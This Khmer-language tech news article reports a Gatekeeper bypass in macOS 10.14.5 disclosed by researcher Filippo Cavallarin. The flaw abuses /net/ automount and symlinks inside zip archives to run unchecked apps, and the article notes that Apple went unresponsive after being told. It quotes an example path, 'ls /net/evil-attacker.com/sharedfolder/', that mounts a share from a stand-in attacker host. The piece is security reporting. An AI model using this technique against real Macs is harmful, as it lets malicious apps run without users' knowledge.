វាងាយស្រួលក្នុងការដំឡើងកម្មវិធីព្យាបាទនៅលើ Mac។ Apple មិន​បាន​ជួសជុល​កំហុស​នោះ​ទេ ទោះ​បី​បី​ខែ​ក្រោយ​មក​ក៏​ដោយ

អ្នកស្រាវជ្រាវសន្តិសុខ Filippo Cavallarin បានបង្ហោះការព្រមានអំពីកំហុសនៅក្នុង macOS 10.14.5 នៅលើប្លក់របស់គាត់។ នេះរួមបញ្ចូលទាំងលទ្ធភាពនៃការរំលងទាំងស្រុងនូវវិធានការសន្តិសុខរបស់អ្នកការពារ។ យោងតាមលោក Cavallarin គាត់បានចង្អុលបង្ហាញកំហុសដល់ Apple រួចហើយនៅក្នុងខែកុម្ភៈនៃឆ្នាំនេះ ប៉ុន្តែក្រុមហ៊ុនមិនបានជួសជុលវានៅក្នុងការអាប់ដេតចុងក្រោយបង្អស់នោះទេ។

Gatekeeper ត្រូវបានបង្កើតឡើងដោយ Apple និងបញ្ចូលទៅក្នុងប្រព័ន្ធប្រតិបត្តិការលើកុំព្យូទ័ររបស់ខ្លួនជាលើកដំបូងក្នុងឆ្នាំ 2012។ វាគឺជាយន្តការដែលរារាំងកម្មវិធីមិនឱ្យដំណើរការដោយគ្មានចំណេះដឹង និងការយល់ព្រមពីអ្នកប្រើប្រាស់។ បន្ទាប់ពីអ្នកទាញយកកម្មវិធីមួយ Gatekeeper ពិនិត្យលេខកូដរបស់វាដោយស្វ័យប្រវត្តិ ដើម្បីមើលថាតើកម្មវិធីត្រូវបានចុះហត្ថលេខាយ៉ាងត្រឹមត្រូវដោយ Apple ដែរឬទេ។

វា​អាច​ជា ចាប់អារម្មណ៍អ្នក។

របស់ Mac

កុំព្យូទ័រ Apple លែងមានសុវត្ថិភាពទៀតហើយ។ មេរោគ macOS កាន់តែជារឿងធម្មតា

អាម៉ាយ៉ា តូម៉ាន

0

នៅក្នុងការបង្ហោះប្លុករបស់គាត់ Cavallarin កត់សម្គាល់ថាតាមលំនាំដើម Gatekeeper ចាត់ទុកទាំងការផ្ទុកខាងក្រៅ និងការចែករំលែកបណ្តាញជាទីតាំងសុវត្ថិភាព។ ដូច្នេះកម្មវិធីណាមួយដែលរស់នៅក្នុងគោលដៅទាំងនេះអាចដំណើរការដោយស្វ័យប្រវត្តិដោយមិនចាំបាច់ឆ្លងកាត់ការត្រួតពិនិត្យ Gatekeeper ។ វាគឺជាលក្ខណៈពិសេសនេះដែលអាចត្រូវបានកេងប្រវ័ញ្ចដើម្បីបើកដំណើរការកម្មវិធីព្យាបាទដោយមិនមានចំណេះដឹងរបស់អ្នកប្រើប្រាស់។

ទិដ្ឋភាពមួយដែលអនុញ្ញាតឱ្យចូលប្រើដោយគ្មានការអនុញ្ញាតគឺមុខងារ automount ដែលអនុញ្ញាតឱ្យអ្នកប្រើប្រាស់ភ្ជាប់បណ្តាញចែករំលែកដោយស្វ័យប្រវត្តិដោយគ្រាន់តែបញ្ជាក់ផ្លូវដែលចាប់ផ្តើមដោយ "/net/"។ ជាឧទាហរណ៍ Cavallarin ដកស្រង់ផ្លូវ "ls /net/evil-attacker.com/sharedfolder/" ដែលអាចបណ្តាលឱ្យប្រព័ន្ធប្រតិបត្តិការផ្ទុកមាតិកានៃថត "sharefolder" នៅក្នុងទីតាំងដាច់ស្រយាលដែលអាចមានសក្តានុពលព្យាបាទ។

អ្នកអាចមើលរបៀបដែលការគំរាមកំហែងដំណើរការនៅក្នុងវីដេអូ៖

កត្តាមួយទៀតគឺការពិតដែលថាប្រសិនបើប័ណ្ណសារហ្ស៊ីបដែលមានតំណភ្ជាប់និមិត្តសញ្ញាជាក់លាក់ដែលនាំទៅដល់មុខងារ automount ត្រូវបានចែករំលែក នោះវានឹងមិនត្រូវបានត្រួតពិនិត្យដោយ Gatekeeper ទេ។ វិធីនេះ ជនរងគ្រោះអាចទាញយកបណ្ណសារព្យាបាទបានយ៉ាងងាយស្រួល ហើយពន្លាវា ដែលអនុញ្ញាតឱ្យអ្នកវាយប្រហារដំណើរការស្ទើរតែគ្រប់កម្មវិធីនៅលើ Mac ដោយមិនចាំបាច់មានចំណេះដឹងរបស់អ្នកប្រើប្រាស់។ Finder ដែលលាក់ផ្នែកបន្ថែមមួយចំនួនតាមលំនាំដើម ក៏មានចំណែករបស់វាចំពោះភាពងាយរងគ្រោះនេះដែរ។

Cavallarin បញ្ជាក់នៅលើប្លុករបស់គាត់ថា Apple បានទាក់ទាញការយកចិត្តទុកដាក់ចំពោះភាពងាយរងគ្រោះនៃប្រព័ន្ធប្រតិបត្តិការ macOS នៅថ្ងៃទី 22 ខែកុម្ភៈឆ្នាំនេះ។ ប៉ុន្តែនៅពាក់កណ្តាលខែឧសភា Apple ឈប់ទាក់ទងជាមួយ Cavallarin ដូច្នេះហើយ Cavallarin សម្រេចចិត្តធ្វើរឿងទាំងមូលជាសាធារណៈ។

ប្រភព៖ FCVL